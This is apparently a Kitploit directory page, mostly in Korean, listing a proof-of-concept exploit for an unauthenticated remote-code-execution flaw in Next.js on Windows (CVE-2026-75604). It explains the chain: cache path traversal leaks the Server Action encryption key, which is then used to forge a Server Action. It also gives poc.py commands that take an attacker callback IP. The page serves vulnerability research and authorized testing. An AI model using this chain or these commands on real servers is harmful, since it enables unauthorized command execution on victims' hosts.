Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-75604 — # CVE-2026-75604 개념 증명 익스플로잇 Windows 호스트 Next.js에서 캐시 경로 탐색 및 위조된 Server Action을 통한 인증되지 않은 RCE(원격 코드 실행) 취약점에 대한 개념 증명 익스플로잇으로, 공인된 보안 테스트용입니다. | Kitploit
도구/GitHubGitHub/hackspeak/cve-2026-75604
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubhackspeak/cve-2026-75604

CVE-2026-75604

# CVE-2026-75604 개념 증명 익스플로잇 Windows 호스트 Next.js에서 캐시 경로 탐색 및 위조된 Server Action을 통한 인증되지 않은 RCE(원격 코드 실행) 취약점에 대한 개념 증명 익스플로잇으로, 공인된 보안 테스트용입니다.

저장소 보기
2181개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-75604 RCE PoC

CVE-2026-75604에 대한 Python 개념 증명(PoC)으로, Windows 호스트에서 실행되는 Next.js 애플리케이션 중 Pages Router와 App Router를 Cache Components 없이 함께 사용하는 경우 발생하는 인증 없는 원격 명령 실행 취약점입니다.

데모

CVE-2026-75604 RCE proof of concept

요구 사항

  • Next.js >=13.4 <15.5.24 또는 >=16.0 <16.3.3
  • 네이티브 Windows 서버
  • Cache Components가 없는 Pages Router 및 App Router
  • 동적 Pages ISR 라우트와 동적 캐시 App 라우트가 있는 기본 파일시스템 캐시
  • 호환되는 클로저 바인딩 Server Action
  • Python 3.9+ 및 대상에서 연결 가능한 콜백 주소

[email protected]에서 검증되었습니다.

python -m pip install -r requirements.txt

사용법

python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE --app-cache-path /PATH/TO/APP_CACHE_INSTANCE

Server Action 경로는 기본적으로 /입니다. 해당 폼에 필드가 두 개 이상인 경우 --action-field를 사용하세요.

필수 인자:

  • --target URL: Next.js 애플리케이션의 기본 URL
  • --callback-ip ADDRESS: 대상에서 연결 가능한 IPv4 주소
  • --pages-cache-path PATH: 기존 동적 Pages Router ISR 페이지
  • --app-cache-path PATH: 파일시스템 캐시로 백업된 기존 동적 App Router 페이지

선택 인자:

  • --command COMMAND: 실행할 명령어(기본값: whoami)
  • --action-path PATH: 호환되는 Server Action이 포함된 App Router 페이지(기본값: /)
  • --action-field NAME: 액션이 사용하는 폼 필드(모호하지 않은 경우 자동 감지)
  • --callback-port PORT: 콜백 포트(기본값: 4331)
  • --listen-address ADDRESS: 로컬 콜백 바인드 주소(기본값: 0.0.0.0)
  • --timeout SECONDS: 요청 및 콜백 타임아웃(기본값: 20)
  • --insecure: TLS 인증서 검증 비활성화

로컬 대상

선택 사항인 target/ 애플리케이션은 [email protected]을 고정하고 표준 Next.js 프로덕션 서버를 사용합니다:

cd target
npm ci
npm run build
npm start

다른 터미널에서 PoC를 실행하세요:

python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed

선택 대상은 필요한 라우트와 /의 호환 Server Action을 제공합니다.

면책 조항

이 PoC는 교육 목적, 보안 연구 및 승인된 테스트 전용으로 제공됩니다. 소유한 시스템 또는 명시적 테스트 권한이 있는 시스템에서만 사용하세요.

크레딧

evolutionstorm에게 크레딧을 제공합니다.

이 PoC는 공개 권고 및 Next.js 패치에서 독립적으로 재구성되었습니다.


分发镜像说明(中文)

本仓库为 CVE-2026-75604 利用 PoC 的中转分发镜像(英文使用说明见上方上游原版 README)。内容由上游公开 PoC 镜像而来,仅作存档与分发用途。PoC 仅供安全研究、漏洞验证与授权测试,请勿用于未授权目标。

漏洞简述 / 취약점 요약

  • CVE-2026-75604 / GHSA-p293-qw3h-jr36:Windows 호스트의 Next.js 무단 원격 코드 실행
  • 약점 분류:CWE-22(경로 탐색)
  • CVSS:9.0(Critical),AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
  • 영향 범위:Next.js >=13.4 <15.5.24、>=16.0 <16.3.3
  • 수정 버전:15.5.24 / 16.3.3
  • 발생 전제 조건:Windows 파일시스템 + Pages Router와 App Router 공존(Cache Components 미활성화)+ 기본 파일시스템 캐시 + 동적 ISR Pages 라우트 + 캐시 App 라우트 + 호환되는 클로저 바인딩 Server Action

핵심 원리:FileSystemCache는 Windows에서 백슬래시(\)를 경로 구분자로 이스케이프 처리하지 않으므로, 공격자는 ..%5C 인코딩으로 캐시 경로를 탐색하여 비밀 파일 server-reference-manifest.json을 읽고 Server Action의 encryptionKey를 유출한 뒤, 클로저 바인딩 Server Action 요청을 위조하여 임의 명령을 실행할 수 있습니다.

환경 요구 사항 / 요구 사항

  • Python 3.9+
  • python -m pip install -r requirements.txt(cryptography、requests)
  • 대상에서 역연결 가능한 공격자 IPv4 주소
  • 위 전제 조건을 충족하는 Windows 대상 애플리케이션

[email protected]에서 검증되었습니다.

사용법 / 사용법

python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP \
  --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE \
  --app-cache-path /PATH/TO/APP_CACHE_INSTANCE
매개변수필수설명
--target URL예Next.js 애플리케이션 기본 URL
--callback-ip ADDRESS예대상에서 역연결 가능한 IPv4 주소
--pages-cache-path PATH예기존 동적 Pages Router ISR 페이지(탐색 앵커)
--app-cache-path PATH예파일시스템 캐시를 사용하는 기존 동적 App Router 페이지
--command COMMAND아니요실행할 명령어(기본값 whoami)
--action-path PATH아니요호환 Server Action이 포함된 App Router 페이지(기본값 /)
--action-field NAME아니요Action 폼이 사용하는 비즈니스 필드(유일한 경우 자동 감지)
--callback-port PORT아니요역연결 포트(기본값 4331)
--listen-address ADDRESS아니요로컬 콜백 수신 주소(기본값 0.0.0.0)
--timeout SECONDS아니요요청 및 콜백 타임아웃(기본값 20)
--insecure아니요TLS 인증서 검증 비활성화

로컬 예제 대상 / 로컬 대상

저장소 내 target/은 재현 가능한 예제 애플리케이션을 제공합니다([email protected] 고정, 표준 프로덕션 서버):

cd target
npm ci
npm run build
npm start

다른 터미널에서 실행:

python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 \
  --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed

예제 대상은 필요한 라우트와 /의 호환 Server Action을 제공합니다.

면책 조항 / 면책 조항

본 PoC는 교육, 보안 연구 및 승인된 테스트 전용으로 제공되며, 소유하거나 명시적 테스트 권한이 있는 시스템에서만 실행해야 합니다. 이 취약점을 악용하면 대상 Windows 호스트에서 임의 명령이 실행되므로, 폐기 가능한 환경에서 테스트하세요.

출처 및 라이선스 / 출처 및 라이선스

  • 원본 PoC 작성자:rafabd1(공개 업스트림 미러 저장소).
  • 취약점 보고자:evolutionstorm、B0RI.
  • 본 PoC는 공개 Advisory 및 Next.js 수정 패치를 기반으로 독립적으로 재구성되었습니다.
  • 배포 저장소는 MIT License를 사용합니다(LICENSE 참조).

참고 링크 / 참조 링크

  • 업스트림 PoC 미러:https://github.com/rafabd1/CVE-2026-75604-poc
  • GitHub Security Advisory:https://github.com/vercel/next.js/security/advisories/GHSA-p293-qw3h-jr36
  • 수정 커밋(file-system-cache.ts + escape-path-delimiters.ts):https://github.com/vercel/next.js/commit/09f9c8a758a6b20f248b0e90e539bba8225c73bb
  • NVD:https://nvd.nist.gov/vuln/detail/CVE-2026-75604
도구 다운로드